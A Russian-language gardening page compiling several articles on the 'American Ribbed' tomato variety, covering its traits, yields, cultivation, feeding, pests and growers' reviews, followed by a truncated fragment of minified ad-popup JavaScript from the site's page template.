0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Характеристика томата сорта американский ребристый

Сорт томата Американский ребристый

Американский ребристый томат впечатляет оригинальной формой и достаточно крупными размерами. Плоды напоминают яркий цветок, который может быть красным, розовым или оранжевым. Данный сорт превращает грядку или теплицу в подобие цветника и при этом дает вкусные урожаи отличного качества.

Сорт томата Американский ребристый

Сортовые особенности

Сорт томата Американский ребристый может быть индетерминантным или детерминантным. В открытом грунте куст достигает 100-120 см, в теплице – 150-170 см (обычно он среднерослый, но в некоторых случаях вырастает до 200 см и выше).

Урожай обычно получают через 115-120 дней после посева.

Плоды

Особенность томата – ярко выраженная ребристость, благодаря которой плод выглядит как цветок. В нарезанном виде плоды выглядят просто великолепно, они будут украшением любого стола.

Броский и аппетитный «томатный цветочек» не оставит никого равнодушным.

Вес одного помидора – от 250 до 500 г. Они бывают красного, малинового, бурого, желтого или оранжевого цветов.

Кожица – тонкая, мякоть – плотная и сочная. Помидоры обладают классическим томатным вкусом и ароматом.

Отменный вкус плодов позволяет добавлять их в салаты и вторые блюда. Более мелкие помидоры иногда консервируют, но обрабатывать их нужно аккуратно – чтобы тонкая кожица не лопнула.

Урожайность

Сорт дает не слишком высокие, но вполне приличные урожаи. С одного куста обычно собирают 4-6 кг. Чтобы повысить данные показатели, куст формируют в 1 стебель, тщательно ухаживают и дают дополнительные подкормки.

Распространение

Американский ребристый сорт рекомендован для южных регионов и средней полосы: на юге помидоры можно выращивать в открытом грунте, а в средней полосе лучше высаживать в теплицу.

По описанию, в теплое и солнечное лето томаты хорошо растут в открытом грунте под пленочным укрытием.

Достоинства и недостатки

Вкусные мясистые помидоры

У ребристого томата целый арсенал положительных качеств:

  • оригинальный и неповторимый внешний вид плодов
  • отменные характеристики вкуса и аромата
  • устойчивость к заболеваниям.

Недостатки: культура требует дополнительных подкормок, переспевшие плоды теряют вкус.

Посадка

Обычно данный томат выращивают в теплице, поэтому посев на рассаду делают в начале или середине марта. Для выращивания в открытом грунте семена высевают с начала или середины апреля. Пересаживать растения можно через два месяца.

Посев

Семена погружают в раствор марганца на 20 минут, а затем проращивают несколько дней во влажной ткани. Почвосмесь готовят из дерновой земли и торфа, прогревают в духовке для дезинфекции, вносят минеральные удобрения.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Дерновую землю заготавливают на лугах со злаковым или бобовым разнотравьем. Обычно для самостоятельного приготовления почвосмеси для рассады используют огородную (или садовую) землю с добавлением перегноя, торфа и песка.

Проросший материал раскладывают в бороздки на расстоянии 2 см друг от друга, увлажняют из пульверизатора, присыпают землей. Ящичек накрывают пленкой и держат в теплом месте до первых всходов (при температуре 24-25°С).

Рассада

Обычно 5-6 дней хватает, чтобы появились всходы. Теперь можно снять пленку и аккуратно полить их теплой водой. На неделю температуру понижают до 16 °С, чтобы растения могли укорениться. Ящик переносят на хорошо освещенный подоконник.

Пикировку проводят на стадии 2 настоящих листьев, при этом внося новую порцию минеральных удобрений.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Первую подкормку рассады делают через 7-10 после пикировки, когда растения укореняться, а корни»заработают».

Пересадка

За две недели до пересадки горшки начинают выносить на улицу для закаливания рассады. Начинают с 1-2 часов в день и постепенно увеличивают время до целого светового дня.

Почву в теплице подготавливают: дезинфицируют марганцем, вносят минеральные удобрения, рыхлят. Для подвязки устанавливают колья, шпалеру или садовую сетку.

Рассаду высаживают вместе с земляным комом (или торфяными горшочками) на расстоянии 50 см друг от друга и поливают теплой водой под корень.

Кусты подвязывают и формируют в 1-2 стебля, обламывая боковые пасынки и обрезая нижние листья.

Полив под корень делают каждые 10 дней (или устанавливают капельную систему орошения). После процедуры землю мульчируют, а помидоры окучивают.

Для мульчирования подойдет сено, торф, сухие листья. Тем, кто не мульчирует грядки, приходится часто рыхлить землю и выпалывать сорняки.

Подкормки

Подкормки делают каждые две недели, отдавая предпочтение минеральным комплексным удобрениям.

Можно совмещать процесс с поливом, растворяя удобрения в воде.

Во время плодоношения для томата особенно важны калийные элементы – их дополнительно вносят после первого урожая.

Если внешний вид растений говорит о нехватке каких-либо элементов питания – делают «быструю» внекорневую обработку по листьям.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Нехватка азота проявляется в виде пожелтения или измельчания листьев. При этом размеры растения существенно снижаются. При нехватке калия может наблюдаться краевой ожог листьев. Фосфорное голодание — это фиолетово — розовая окраска изнанки листьев.

Профилактика заболеваний

Характеристики устойчивости к заболеваниям у сорта довольно высокие. По описанию огородников, томаты болеют редко, но иногда могут поражаться фитофторой.

Профилактика включает тщательный уход за чистотой грядок (прополка, рыхление, мульчирование, формирование) и контроль уровня влажности в теплице с помощью проветриваний.

Растения после пересадки регулярно обрабатывают бордоской жидкостью или хлорокисью меди, поливают раствором золы.

Отзывы

По мнению огородников, Американсий ребристый помидор вполне соответствуют описанию. На плодах отчетливо видны лепестки-дольки. Они вырастают крупными или средними, обладают отменным классическим вкусом.

Овощеводы отмечают важность своевременного сбора урожая. Если он переспевает, то плоды сильно размягчаются и вкус их становится хуже.

Опыт по количеству полученныго урожая неоднозначный. Зачастую первые попытки вырастить ребристый томат не дают обильных урожаев и не превышают 2-3 кг с куста (а иногда вырастает всего несколько крупных плодов).

Однако со второй или третьей попытки урожайность получается увеличить. Есть и такие овощеводы, у которых томат раскрывается сразу и стабильно радует хорошими урожаями.

Большинство огородников выращивает данный сорт для собственных нужд: потребления в свежем виде и переработки. Однако, благодаря эффектной внешности и хорошему качеству плодов, он пользуется спросом у покупателей. Для продажи его рекомендуют выращивать в небольших количествах — чтобы расширить ассортимент, и собирать плоды немного раньше оптимальной зрелости.

Характеристика томата сорта Американский Ребристый

Есть огородники, которые любят выращивать на своих участках интересные растения. Это могут быть экзотические овощи и фрукты такие, как клубника Пайнберри, Красные огурцы, которые являются Тладиантой Сомнительной и многие другие. Но очень часто такими растениями становятся различные сорта томатов, отличающиеся цветом, формой плодов или оригинальностью куста. Красивым, в этом плане, является томат Американский Ребристый. И если любители однажды вырастили его, то в дальнейшем будут рекомендовать данный сорт и друзьям, и знакомым.

Характеристика томата сорта Американский Ребристый

Характеристика

Визитной карточкой любого растения является его характеристика. У нашего томата она складывается из нескольких особенностей.

  1. Сорт Американского Ребристого разноцветного томата считается сортом народной селекции.
  2. Относится растение к детерминантным видам, среднепозднего созревания.
  3. Выращивать его можно, как в открытом грунте, так и в теплице.
  4. Отличается оригинальной формой плодов, которые могут быть разного цвета.
  5. Вес плодов колеблется в пределах от 200. гр до 400 гр. и выше.
  6. Пригодны помидоры для употребления в свежем виде и для переработки.
  7. Урожайность с одного куста может достигать 6кг.

Американский Ребристый сорт томата не является детищем опытных селекционеров. Он продукт долгого выращивания любителями, которые оставляли на семена, полюбившиеся им плоды.

Описание растения

Томат рекомендуется выращивать в 2 или 3 стебля. Отзывы опытных огородников утверждают, что при формировке в 1 стебель плоды будут крупнее. Штамбовое детерминантное растение способно вырасти до 150см. Стебли имеет прочные, но если не подвязывать растение, то они могут ломаться.

Облиственность Американский Ребристый, имеет среднюю. Все листья окрашены равномерно в яркий насыщенный зеленый цвет. Рельефность листьев выражена слабо, прожилки тонкие и находятся на уровне листовой пластины.

Описание плодов

Плоды этого томата очень оригинальны, ребристые, словно разрезанные на дольки. Среди народа их называют ласково Хризантемами, за внешнюю схожесть с этим красивым цветком. Они приплюснутые в районе полюсов.

Имеют блестящую тонкую кожицу, которая при избыточной влажности может растрескиваться. Цвет плодов может быть разным:

Плоды имеют оригинальную форму

В зависимости от цвета и места произрастания, сорт Американский Ребристый получил дополнительные имена.

Так, один из помидоров называется Лотарингская красавица, он красного цвета, а Лотарингская Красавица Оранжевая, как видно из названия, имеет оранжевые плоды, словно золотое солнце. Кубинский Черноплодный отличается темно фиолетовым цветом, иногда имеющим синий и бордовый оттенок плодов, похожих на плоско округлое сердце. Сорт Пузата Хата скорее длинноплодный, но расширяется плод снизу, и он не ребристый, а складчатый.

Описание помидоров будет не полным, если не рассказать о вкусе плодов. Вкус, которым обладают помидоры данного сорта Американский Ребристый, обыкновенный помидорный, но более яркий и насыщенный. Присутствует в плодах больше сахара, чем кислинки, при этом их аромат отличается сладостью и свежестью.

Применение помидоров

Может показаться, что эти помидоры только яркий пример оригинальности и красоты. Но их плоды пригодны для различного употребления.

  1. При нарезке для салатов они могут быть, как компонентом блюда, так и его украшением.
  2. С таких плодов изготавливают соки отличающиеся особенной густотой.
  3. Кетчупы, заправки для вторых блюд и аджики получаются из красных и шоколадных плодов — помидорного цвета, а из оранжевых и желтых плодов — янтарного.
  4. К консервированию в целом виде, пригодны плоды, которые завязываются на верхушках. Они мельче и хорошо проходят через горлышки банок.

Из этого следует, что помидор, у которого больший объем, подойдет для любой переработки. А другие помидоры, имеющие нужный размер для цельно плодного консервирования, будут заготовлены впрок, целыми.

Подготовка к выращиванию рассады

Американский Ребристый, как практически все томаты, выращивают рассадным методом. Чтобы не допустить досадных промахов, нужно знать агротехнику и описание процессов посева семян и последующего ухода за ростками. Сначала, за два месяца до высадки рассады в грунт, готовят емкости — рассадники, субстрат и семена.

Для рассадников подойдут контейнеры с прозрачными крышками, горшки и различные емкости, которые можно накрыть стеклом или пленкой. Грунт приобретают специально или же, что чаще бывает, готовят сами. Для этого берут:

  • садовую землю;
  • древесную золу;
  • мелкий песок, но без пыли;
  • хорошо перепревший коровяк.

Субстрат тщательно перемешивают, легко сбрызгивают водой и сжимают в кулаке. Если после сжатия грунт рассыпается, то он готов к применению, если же сбивается в комок, то добавляют еще песок.

Посев семян и уход за ростками

Растение нуждается в подвязывании

Перед посевом семена замачивают в светло розовом растворе марганцовки, для обеззараживания.

Для стимуляции роста можно в раствор добавить сок алоэ. Через 8 часов их промывают и слегка подсушивают.

На дно контейнеров кладут мелкий дренаж, на который слоем около 10см насыпают грунт и разравнивают его. На поверхность выкладывают семена и присыпают их грунтом до 1см высотой. Потом сбрызгивают из пульвелизатора, накрывают крышками или полиэтиленовой пленкой и ставят на проращивание. Температура в рассадниках должна быть: днем — 25гр тепла, а ночью — не ниже 16 гр.

После появления второй пары листочков сеянцы пикируют. Для того чтобы молодые растения лучше перенесли пересадку, их сбрызгивают раствором борной кислоты. После этого уход за ростками сводится к поливу и проветриванию. В емкостях растения находятся около 70 дней.

Если планируется посадка Американского Ребристого томата в открытый грунт, то рассаду необходимо закалить. Для этого за пару недель до высадки выносят контейнеры на свежий воздух и открывают крышки, на пол часа в первый день. Пребывание на солнце увеличивают каждодневно на 1 час.

Высадка на постоянное место

На участке или в теплице делается разметка лунок так, чтобы на 1 кв.м. было высажено 3 растения, при формировании кустов в 2 стебля и 4 ростка, при формировании в 1 стебель. Желательно возле каждой лунки установить прочную опору для подвязывания кистей плодов. Они при росте, имеют большой вес и могут, под своей тяжестью, или оторваться и упасть, или полностью сломать куст.

Что касается ухода, то он сравнительно прост.

  1. Своевременный полив, не допускающий пересыхания грунта.
  2. Прополка и рыхление земли между растениями и рядами.
  3. Защита от вредителей.
  4. Удобрение томатов.
  5. Профилактика болезней и лечение растений.

Поливать томаты нужно только под корень, не допуская попадание воды на листья и плоды, что может привести к возникновению болезней. Даже если сорняков не наблюдается, то рыхление необходимо потому, что дает доступ воздуха в район корневища.

Удобрять растения нужно первый раз до образования цветочных кистей.

Последующие обработки, можно проводить не раньше 14 дней. Для удобрения томатов применяют химические препараты и органику.

Томат «Американский ребристый»

Томат «Американский ребристый», описание которого и есть тема статьи, очень необычный помидор. Он точно вызовет интерес соседей по даче, а вас порадует своим приятным вкусом, ароматом. Мы вас познакомим также и с тем, как вырастить данный сорт.

Общее описание

Нет точных данных, когда томат был создан, но стал он востребован и приобрёл популярность с 80-х годов прошлого столетия. Плоды данного сорта имеют необычную форму – на них много рёбер. При этом помидоры нельзя назвать гигантами, как это часто бывает среди плодов с множеством рёбер. Особенно интересно выглядит томат, когда он разрезан кольцами.

Нельзя назвать сорт очень урожайным, но и отнести к малопродуктивным его определённо нельзя. Плюсы же сорта не только в его ребристой форме, но и в хорошей устойчивости к болезням, неприхотливости и выносливости к недостаткам влаги. Лучше всего подходит для выращивания в южных регионах. Во всех же остальных кусты рекомендовано сажать в теплице или в парниках из плёнки. Итак, давайте, более подробно разберём сорт и его показатели.

Томат «Американский ребристый». Характеристика и описание сорта

  • Относится к детерминантным видам. Кусты штамбовые.
  • Сорт имеет среднепоздние сроки созревания. Так, вы сможете собрать первый урожай красивых ребристых томатов через 115-125 суток после посева рассады и ее всходов.
  • Имеет хорошую устойчивость к самым распространённым томатным заболеваниям.
  • Кусты нельзя назвать высокорослыми, но и компактными их не назовёшь. В среднем стебель вырастает до 130-150 см. В теплице же стебель может вытягиваться и до 170 см.
  • Нужны опоры в виде проволоки или шпалеры.
  • Форма плодов — приплюснутая, цвет шкурки – насыщенный красный.
  • Масса — в среднем около 200-300 грамм, но опять же томат «Американский ребристый», по отзывам, и фото может быть и более крупных размеров — до полкилограмма.
  • Камер в помидорах – 6-7.
  • Плоды не очень долго могут храниться после сбора, поэтому для транспортировки на далёкие расстояния не подходят. Также их лучше сразу употреблять в пищу или закручивать на зиму.
  • С метра квадратного, где лучше всего сажать 3-4 куста, вы можете получить около 12 кг помидоров. С одного куста – до 3-4 кг.
  • Вкусны плоды в свежем виде, а также в виде соуса, сока и после бочкового маринования. Но особенно тонкого вкуса и аромата в сорте нет, многие дачники считают, что томат можно выращивать лишь для красоты, так как больше он ничем не примечательный.
  • Нужно формирование в 2-3 стебля. Если вы хотите более крупных плодов, то тогда оставляйте один стебель.

Итак, как вы поняли о помидоре «Американский ребристый» из его описания, он имеет противоречивые отзывы. С одной стороны, дачники хвалят его, с другой, не очень остаются довольны. Но стоит отметить, что данные томаты от неправильного ухода могут терять во вкусе и аромате, поэтому говорить, что сорт непримечательный по этим показателям сложно.

Каждому дачнику своё, и чтобы поняли именно вы, нужен ли вам данный томат, его нужно хотя бы раз посадить. Про выращивание вы прочитаете ниже. Также стоит отметить, что даже несколько кустов «Американского ребристого» помидора, которые дадут вам небольшой урожай, разнообразят свои видом стол и зимние закрутки.

Агротехника. Томат «Американский ребристый»

Семена помидора «Американский ребристый» начинают высевать в первой декаде марта в ящики на глубину в 1 см. Почву лучше купить готовую, так как томат капризен к плодородию, а готовый грунт содержит в себе полный комплекс всех необходимых для рассады компонентов. Но и он может быть заражён в редких случаях паразитами или болезнями, поэтому лучше пролить горячей водой с кристаллами марганцовки заранее контейнеры, в которые будет осуществляться посадка.

В остальном же все довольно стандартно – посевы вы увлажняете, накрываете пленкой или стеклом, что не очень удобно и безопасно. Примерно через 7-10 суток у вас проклюнутся первые всходы, теперь вы должны снять укрытие и обеспечить рассаде свет, полив тёплой, отстоявшейся водой по мере просыхания. Пикировку производят, когда у саженцев выросли три настоящих листика. Грунт снова берёте покупной или смешанную садовую землю с магазинной, и снова лучше пролить кипятком заранее эту смесь.

В теплицу перенос осуществляют уже в конце апреля, на улицу после всех заморозок уже ближе к лету. В южных регионах это будет раньше. Саженцы нужно будет закаливать пару недель на открытом воздухе с увеличением времени. На метр квадратный не сажайте больше четырёх кустов. Сразу подумайте про опоры.

Мы уже говорили, что плодородие и подкормы играют важную роль. Чтобы грунт на участке был подходящим для данного сорта, вы можете сделать простое действие – закопать в почву люпин однолетник. Он будет перегнивать и даст хороший подкорм. Во время посадки, и когда рассада зацветет, подкормите ее препаратом «Растворин. Также можно пару раз внести коровяк, растворённый в воде.

Конечно, кустам, где бы они ни росли, могут докучать насекомые. С ними необходимо бороться вовремя, иначе они могут погубить урожай. В продаже существует много разных инсектицидов для борьбы с паразитами. Но вы можете использовать народные методы борьбы, которые не стоят денег, не вредят кустам с плодами, не накапливаются в помидорах, и, как следствие, не вредят вашему здоровью. Многие насекомые не переносят душистых трав, специй, запаха сорняков. Вот почему их они на атаковывают. Поэтому простые настои на полыни, чистотеле, перце красном и чёрном, корице могут спасти ваши томаты быстро и без последствий.

Кусты для большего урожай формируют в два стебля, оставляя по два пасынка в самой верхней пазухе. Но так плоды будут по 200-250 грамм, если же вы хотите более крупный урожай, то оставьте только один стебель. Полив и рыхление – это тоже приёмы агротехники, необходимые для хорошего урожая сорта томата «Американский ребристый».

Таким образом, вы можете получить уникальные плоды. С их помощью ваш стол станет более разнообразным, а ваши грядки будут гордостью для вас.

Вкусный сорт похожий на маленькую тыкву — томат Американский ребристый: советы по посадке и уходу

Одно из лидирующих мест по привлекательности среди сортов томатов занимает Американский ребристый. Он порадует глаз не только огородников, но и украсит блюда на обеденном столе.

Высота Место посадки Сроки созревания Цвет плодов Размер плодов Происхождение Форма плода
Среднерослый Теплица, Открытый грунт Среднеспелые Красные Крупный Сорт Плоскоокруглые

Описание и характеристики сорта

Сорт томатов штамбовый, детерминантный. Относится к среднеспелым разновидностям. Растение среднеоблиственное, среднерослое, достигает 120-150 см в высоту. Содержание сухих веществ — около 6%. Бывают красные, бурые, желтые раскраски. Вкус сладковатый, фруктовый. Мякоть мясистая, сочная и нежная.

Страна выведения и год регистрации

Был выведен в результате любительской селекции. В 80-х годах получил популярность и выращивается на огородах по сей день. Томат быстро заслужил признание среди огородников за счет мощного куста и непривычной формы плодов.

В каких регионах лучше выращивать

Сорт хорошо приспособлен к теплому климату, поэтому для достижения наилучшего результата его следует выращивать в южных регионах на открытом грунте. В районах средней полосы советуют растить под пленочным укрытием. В северных регионах гибрид порадует своими плодами только при выращивании в тепличных условиях.

Преимущества и недостатки

  • необычный внешний вид плодов;
  • не требует частого полива;
  • вкусовые качества;
  • устойчивы к стандартным заболеваниям томатов;
  • высокий уровень устойчивости к паразитам.

Минусы:

  • средние показатели урожайности;
  • капризен к многим подкормкам;
  • подвержен растрескиванию плодов при излишке влаги;
  • требует подвязку к опоре и пасынкование;
  • не приспособлен к транспортировке и длительному хранению.

Урожайность

Томат обладает средней урожайностью. При надлежащем уходе с одного куста можно собрать около 3 кг плодов при весе одного помидора в 150-250 г. При первом сборе томаты могут быть гораздо крупнее — 300-400 г.

Особенности выращивания

Посев семян на рассаду производят за 65-70 дней до высадки в почву. Формируют растение в 1-3 стебля, при этом если 2-3 стебля — на 1 кв м. располагают 3 рассады, если форма куста предполагается в 1 стебель — 4 рассады. Ствол обязательно фиксируют подпорками, если для климата характерны сильный ветер или грозы.

Посадка

Идеальным грунтом для выращивания сорта помидоров считается тот, который подходит под следующие критерии:

  • богат на калий и азот;
  • температура почвы теплая;
  • осенью были добавлены пепел, скорлупа и компост;
  • до высадки томатов на нем росли огурцы, петрушка, цветная капуста, морковь или кабачки.

Рассаду высаживают в грунт после появления 2-3 листочков. При формировании куста в одну ветвь и регулярном удалении лишней листвы и пасынков можно получить более крупные плоды — от 0,5 кг и выше.

На протяжении всего периода роста и плодоношения Американский томат необходимо постоянно подкармливать и удобрять, так как они довольно капризные. При неправильно подобранных удобрениях может пострадать качество и количество плодов. Хорошую урожайность сорт показывает, произрастая на почве, богатой калием, азотом и натуральными органическими веществами.

Борьба с вредителями

Наиболее распространенными вредителями ребристого плода считаются подгрызающая совка и паутинный клещик. Справиться с ними поможет обычный мыльный раствор, приготовленный в домашних условиях. Химические средства также отвадят вредителей от томатов. Нужно запомнить несколько правил, которые помогут сохранить растение:

  • не сажать возле картофеля или на месте его прошлого произрастания;
  • пропалывать сорняки;
  • травлю вредителей производить только на сухом растении;
  • не допускать распространение болезни на другие растения, удалять зараженные или больные кусты.

Томат «Американский ребристый»: характеристика сорта, отзывы

Селекционеры постоянно разрабатывают новые сорта у овощей, томаты конечно не исключение. Изучая описание сорта томатов ребристых можно составить максимально полную картину. Какой он бывает, как выглядит, что требуется для выращивания. Подробное описание, новые фото, оставленные отзывы практиков.

Ребристые плоды

Рассматривая особенности сорта, конечно взгляд сначала упадет на сами томаты. Если смотреть по всем сортам, то ребристых сортов существует около десятка. Большие, маленькие, слегка ребристые или полностью. Такие плоды больше походят на небольшие красные тыквы. Особенно томат американский ребристый. Его «ребра» четко выражены, по форме и чередовании они разные. Бывают равномерные, по плоду идут, кажется, словно невидимый художник с линейкой бегал по кустам, рисуя одинаковые линии.

Одни плоды выглядят обычными плоскими, причем диаметр будет 15-18 см, другие округлые, ребристые. И все соседи, плоды одного куста!

Поваров томат радует особенно. Если разрезать помидоры вдоль, то нарезка превращается в эстетическое наслаждение. Части ровные, красивые и одинаковые, мякоть почти не вываливается. Если резать его иначе, поперек, то выходит настоящий цветок, где ребра – лепестки. Подобной нарезкой можно украсить салат или закуску, дополнить бутерброд. Конечно, не все плоды дают красивые цветки в своем поперечном разрезе. Бывает, перепортишь десяток, ведь сегменты не бывают идеально ровными везде.

Минусы плодов – встречаются пустоты, когда в камерах нет содержимого. Увы, помидор американский и ребристый встречается беловатый, с волокнистой структурой. Хотя, некоторые огородники грешат на недостаток ухода. Мол, волокнистость и пустоты камер результаты неравномерного полива.

Насчет вкуса мнения расходятся. Стенки плодов довольно плотные, цвет приятный, красный, кожица упругая. При нарезке неплохо, держат форму, но для дегустации не слишком. В томате недостаточно кислот и порой вкус бывает пресным. Опытные огородники советуют корректировать состав грунта, работать над подкормкой.

Повара хвалят томат, мол, он прекрасен в фаршировании. Флорентийский ребристый томат, с его плотными, толстыми стенками хорошо продержат форму, внутренность довольно объемная.

Для последующей переработки сорт у томата «Американский ребристый» как и томат «Воловьи уши» подходит тоже неплохо. Можно делать пасты, разнообразные соусы, например, под бифштекс или пельмени, также вкусным выходит домашний томатный сок. Сухих веществ внутри достаточно для густой консистенции и насыщенного вкуса.

Где выращивать

Крайне популярен для южных регионов, где климат ровнее и мягче. Томат действительно любит Солнце, тепло. Можно пробовать растить его в теплицах или укрывать пленкой, но в местах с холодным, резкоконтинентальным климатом томат растет хуже. Описание сорта нравилось тысячам северных огородников, но увы, им оставалось только фото. Вырастить свои томаты никак не выходило.

Впрочем, характеристика у сорта включает и хорошие моменты, кроме привлекательности томата для поваров и внешнего вида. Сорт стойко переносит случающиеся перебои с поливом или осадками. Помидорам не нужно много воды, но, если не следить за количеством, можно получить больше плодов с внутренними пустотами.

Цвет обычных зрелых плодов – красный, его оттенки. Редко попадаются действительно гладкие плоды.

По размерам крупные, кусты индетерминантные, значит, у них нет определенной точки конца роста. Кусты бывают 1,7, 2 метра, требуется привязывать, формировать стебель, своевременно и постоянно пасынковать, иначе разрастутся. Малейшие лишние веточки будут забирать больше питательных веществ, и томаты выходят слишком мелкими, без вкуса.

Плоды 300-600 г, большие. Но чтобы добиться такой величины, нужно поработать хорошенько над грунтом и подкормкой. Американский ребристый настоящий привереда, которому нужен обязательно лучший участок у огорода, где больше Солнца, почва плодородней. Но обеспечивая ему питательные вещества, уход, и завязывание, нужно помнить и о норме. Малейшие перегибы потом отразятся на урожае.

Ребристые томаты обычно созревают средне. Редко радуют быстрыми сроками, но, чтобы порадовать себя, можно ускорить формирование рассады. Опытные огородники часто ориентируются на первые числа у марта.

Весь период выращивания рассады помидор составляет 55-60 полных дней. Высадка совершается в уже приготовленную, выровненную грунтовую смесь, которую успели заправить органикой, нужными удобрениями. Томаты приветствуют локальные удобрения, внекорневые «подарки». Для хорошего урожая нужно чередовать регулярно минеральные с органическими.

Любит «Американский ребристый» и домашние травяные «болтушки» — травы собираются, затем замачиваются в обычной воде, пока не забродят. Для полного эффекта к ним нужно добавлять минералку. Если разбавлять их Аммиачной селитрой или суперфосфатом, то смесь выйдет азотистой.

Заболевания

Помидоры не слишком хорошо переносят разнообразные заболевания, особенно грибковые. Поэтому обязательна своевременная обработка, нужно применять фунгицидные специальные препараты, где есть медь. Регулярно осматривать все кусты. Обработки же начинаются в момент появления завязи, дальше уже с перерывами 10-12 дней.

Если температура вдруг упадет, и влажность повысится, урожай серьезно пострадает. Поэтому данные помидоры опытные огородники, садоводы, советуют растить лучше в теплицах, где климат можно регулировать. заодно лучше защитить кусты от грибковых неприятностей.

Немало бед приносит подгрызающая совка. Увы, напасть случается и в условиях теплиц, и на свободном, открытом грунте. Спасает регулярный осмотр и обработка «Стрелой», надежное средство. Чтобы для будущего урожая совка не стала непрошеным гостем, нужно еще перед высадкой тщательно обработать грунт, собрать вручную всех личинок, затем опрыскать «Стрелой».

Паутинный клещик тоже встречается. Помогает мыльный раствор, которым нужно вручную протирать пораженные участки у кустов. Мыло безвредно самому кусту и не отражается на вкусе плодов. Можно для профилактики обрабатывать мыльным раствором веточки, листья, его запах отпугнет вредителей.

Бывают другие насекомые, например, гусеницы. Их нужно тоже собирать вручную. Спасает осмотр кустов, прополка.

Плюсы, минусы

Среди несомненных плюсов есть:

• Внешний вид (оригинальные, яркие и конечно красивые, большие);
• Устойчивость, скорее непритязательность к недостатку полива;
• Неплохой иммунитет;
• Неплохая урожайность (при соблюдении всех нюансов, должном уходе);
• Кулинарные достоинства (удобно резать, вкусные соусы или подлива, добавка в закуски, салат, даже украшение стола).

А недостатки: большая любовь к теплому, ровному климату, мешающая большинства регионам страны опробовать сорт на своих огородах и вид довольно придирчив к качеству и количеству подкормки.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
